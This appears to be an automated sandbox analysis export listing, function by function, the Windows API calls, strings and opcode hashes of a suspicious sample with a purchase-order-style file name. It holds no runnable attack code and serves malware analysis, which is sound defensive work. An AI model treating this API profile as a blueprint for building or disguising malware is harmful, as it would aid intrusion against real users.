                                                                                                                                                                                                      • Opcode Fuzzy Hash: 301dd562f504750e18c9c09a54e90c3d09a2858f6c32928bb50ba07065798680
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64C13671608304AFC704EF65C88492BB7E9FF88309F00492EF9899B252D775ED09CB96
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00444047
                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004430A5,?,00000001), ref: 0044405B
                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00444062
                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004430A5,?,00000001), ref: 00444071
                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00444083
                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004430A5,?,00000001), ref: 0044409C
                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004430A5,?,00000001), ref: 004440AE
                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004430A5,?,00000001), ref: 004440F3
                                                                                                                                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004430A5,?,00000001), ref: 00444108
                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004430A5,?,00000001), ref: 00444113
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2156557900-0
                                                                                                                                                                                                      • Opcode ID: e5d4fd48dc500434fe148b757332dce145f8f0d543d7b8699ee7a378b0749fbc
                                                                                                                                                                                                      • Instruction ID: 6ecddd2d5d529813481c134c16481e56c21dc0cb4356134cfef7aefd52ab227f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5d4fd48dc500434fe148b757332dce145f8f0d543d7b8699ee7a378b0749fbc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1631A772900204AFEB10DF54DC49F6E77A9BB98312F10C02AF905E6390DB78DD408B5C
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004030DC
                                                                                                                                                                                                      • CoUninitialize.OLE32(?,00000000), ref: 00403181
                                                                                                                                                                                                      • UnregisterHotKey.USER32(?), ref: 004032A9
                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00475079
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 004750F8
                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00475125
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                      • String ID: close all
                                                                                                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                                                                                                      • Opcode ID: b4ecc819e782719df8c45d7ebc1308d01352aa1ef7aa02526371437d7e7e849f
                                                                                                                                                                                                      • Instruction ID: 5a794c083a5269744521f991c5528a76a1dc2fb916643718be34c64ed1899f27
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4ecc819e782719df8c45d7ebc1308d01352aa1ef7aa02526371437d7e7e849f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19914E74601102DFC705EF15C895AA9F7A8FF05309F5481BEE50A6B2A2DF38AE56CF48
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 0041CC15
                                                                                                                                                                                                        • Part of subcall function 0041CCCD: GetClientRect.USER32(?,?), ref: 0041CCF6
                                                                                                                                                                                                        • Part of subcall function 0041CCCD: GetWindowRect.USER32(?,?), ref: 0041CD37
                                                                                                                                                                                                        • Part of subcall function 0041CCCD: ScreenToClient.USER32(?,?), ref: 0041CD5F
                                                                                                                                                                                                      • GetDC.USER32 ref: 0047D137
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0047D14A
                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0047D158
                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0047D16D
                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0047D175
                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0047D200
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                                                                                                      • Opcode ID: a1c2d8b331fa4b7bb6e904f4e3bae0450808739646f069972dd56e74f4a1e8b2
                                                                                                                                                                                                      • Instruction ID: 9a6e06668591dea6332ce3a20a7db368b064226a46ae5558b1ec45aff3e26ff4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1c2d8b331fa4b7bb6e904f4e3bae0450808739646f069972dd56e74f4a1e8b2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1710630900205DFCF219F64CC81AEA3BB1FF48314F14866BED599A2A6D7399C82DF59
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RtlDecodePointer.NTDLL(00000000), ref: 00AF1A3E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DecodePointer
                                                                                                                                                                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                      • API String ID: 3527080286-3064271455
                                                                                                                                                                                                      • Opcode ID: 78cffae3901bf6ac20d5b9c6b64f84de1aa513b717e37146f98a54851f8a1fe6
                                                                                                                                                                                                      • Instruction ID: ed57f77e42200778b187e989476ad21b0c9dc5095bbb473750fac1528d0adc5f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78cffae3901bf6ac20d5b9c6b64f84de1aa513b717e37146f98a54851f8a1fe6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11512471A0490ECBCB14AFE8E9485FDBBB4FF49310F600195E681A72A4DB758E24DB54
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F
                                                                                                                                                                                                        • Part of subcall function 0041B63C: GetCursorPos.USER32(000000FF), ref: 0041B64F
                                                                                                                                                                                                        • Part of subcall function 0041B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0041B66C
                                                                                                                                                                                                        • Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000001), ref: 0041B691
                                                                                                                                                                                                        • Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000002), ref: 0041B69F
                                                                                                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0046ED3C
                                                                                                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 0046ED42
                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 0046ED48
                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0046EDF0
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046EE03
                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0046EEDC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                      • API String ID: 1924731296-2107944366
                                                                                                                                                                                                      • Opcode ID: 7dd245f07ec66fcb69d7960a22f03c09ededebc6b62677e0d681709a8d065ff4
                                                                                                                                                                                                      • Instruction ID: a7776d5b36f7ee75d5a2d2972a908be155b85c6b5756da9afb6625da37bf1bac
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7dd245f07ec66fcb69d7960a22f03c09ededebc6b62677e0d681709a8d065ff4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3451CE74204300AFD700EF21DC96FAA77E4FB88708F004A2EF555972E2EB799954CB5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004545FF
                                                                                                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045462B
                                                                                                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0045466D
                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00454682
                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0045468F
                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004546BF
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00454706
                                                                                                                                                                                                        • Part of subcall function 00455052: GetLastError.KERNEL32(?,?,004543CC,00000000,00000000,00000001), ref: 00455067
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1241431887-3916222277
                                                                                                                                                                                                      • Opcode ID: a045060e8911059459431702f3733a8007696582b43d561265531298ad99e5da
                                                                                                                                                                                                      • Instruction ID: 06e4a2979523fa4a57f0d8e8717a317025dbf267735069217734f69923b342c5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a045060e8911059459431702f3733a8007696582b43d561265531298ad99e5da
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF4170B1501205BFEB019F50CC85FBF77ACEF49719F00402AFE059A186D77899899BA8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0049DC00), ref: 0045B715
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0049DC00), ref: 0045B749
                                                                                                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0045B8C1
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0045B8EB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 560350794-0
                                                                                                                                                                                                      • Opcode ID: 4982fa3a0f05e41a5b350e1a50a919fd4e6bbf6e1a210c163b9f95837ca6325d
                                                                                                                                                                                                      • Instruction ID: 2a68371652a71209ab2e3705f17ac1a5083255551f6ec9de84d798a73dae6afb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4982fa3a0f05e41a5b350e1a50a919fd4e6bbf6e1a210c163b9f95837ca6325d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6F16F71A00209EFCF04EF94C884EAEB7B9FF48315F10855AF905AB251DB35AE46CB94
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004624F5
                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00462688
                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004626AC
                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004626EC
                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0046270E
                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0046286F
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004628A1
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004628D0
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00462947
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4090791747-0
                                                                                                                                                                                                      • Opcode ID: 28627dc041d2b1224d2551d97f425b19d1c36539e168d181bcabc899cc5813f2
                                                                                                                                                                                                      • Instruction ID: 297d9b7ce7acee4b45dcf329f4ac40872c5cbc720c169c6e9c03bb5cd95c0242
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28627dc041d2b1224d2551d97f425b19d1c36539e168d181bcabc899cc5813f2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92D1B231604700EFCB14EF25C991A6EBBE1AF84314F14856EF8859B3A2DB78DC45CB5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0046B3F4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InvalidateRect
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 634782764-0
                                                                                                                                                                                                      • Opcode ID: ab9fc08601ebb2c91194f8ccf8b03e13aa72e8646b51a6a5d94ddda0b10f235f
                                                                                                                                                                                                      • Instruction ID: 37315d118532037fd48edcb4b58127136346e69ed462c9549075cd98b53ef0c5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab9fc08601ebb2c91194f8ccf8b03e13aa72e8646b51a6a5d94ddda0b10f235f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44517431600204BBDF249F158C85B9E3B64EB05318F644517FA15D63E2EB79E9D08BDA
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0047DB1B
                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0047DB3C
                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0047DB51
                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0047DB6E
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0047DB95
                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0041A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0047DBA0
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0047DBBD
                                                                                                                                                                                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0041A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0047DBC8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1268354404-0
                                                                                                                                                                                                      • Opcode ID: 0cf6ee739ab52051da489bb8517c88828cd0cf7fce358cea2fa76b683adbfda0
                                                                                                                                                                                                      • Instruction ID: fadf16feb8645e96a8cf497107f48763286d092d757fb9cbab283d3aeb1fb45e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0cf6ee739ab52051da489bb8517c88828cd0cf7fce358cea2fa76b683adbfda0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65519B30A01208EFDB20CF64CC81FEA37B4AF08354F10452AF95A962D0D7B8ED90CB59
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00445FA6,?), ref: 00446ED8
                                                                                                                                                                                                        • Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00445FA6,?), ref: 00446EF1
                                                                                                                                                                                                        • Part of subcall function 004472CB: GetFileAttributesW.KERNEL32(?,00446019), ref: 004472CC
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 004475CA
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 004475E2
                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 004475FB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 793581249-0
